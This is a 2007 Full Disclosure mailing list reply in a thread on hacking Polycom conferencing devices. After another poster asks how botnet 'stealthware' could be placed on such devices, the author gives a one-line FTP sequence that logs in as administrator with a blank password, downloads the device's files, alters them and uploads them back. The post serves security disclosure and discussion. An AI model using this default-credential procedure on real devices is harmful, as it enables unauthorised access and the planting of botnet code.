Full Disclosure mailing list archives
Re: Polycom hacking
From: Paul Schmehl <pauls () utdallas edu>
Date: Fri, 29 Jun 2007 09:25:21 -0500
--On Thursday, June 28, 2007 22:25:08 -0400 Peter Dawson <slash.pd () gmail com> wrote:
interesting concept.. harvesting a polycom device for Botnet's. hmmmmmmmmm.. the key would be how the heck to get the stealthware on such a device ??
That's easy. ftp target.domain.tld user administrator pass (blank) mget * alter files to suit mput * -- Paul Schmehl (pauls () utdallas edu) Senior Information Security Analyst The University of Texas at Dallas http://www.utdallas.edu/ir/security/
Attachment:
_bin
Description:
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Polycom hacking Paul Schmehl (Jun 26)
- Re: Polycom hacking StaticRez (Jun 26)
- Re: Polycom hacking J. Oquendo (Jun 26)
- Re: Polycom hacking Paul Schmehl (Jun 26)
- Re: Polycom hacking J. Oquendo (Jun 26)
- Re: Polycom hacking Paul Schmehl (Jun 26)
- <Possible follow-ups>
- Re: Polycom hacking b . hines (Jun 26)
- Re: Polycom hacking Paul Schmehl (Jun 26)
- Re: Polycom hacking Paul Schmehl (Jun 27)
- Re: Polycom hacking Peter Dawson (Jun 28)
- Re: Polycom hacking Paul Schmehl (Jun 29)
- Re: Polycom hacking Peter Dawson (Jun 28)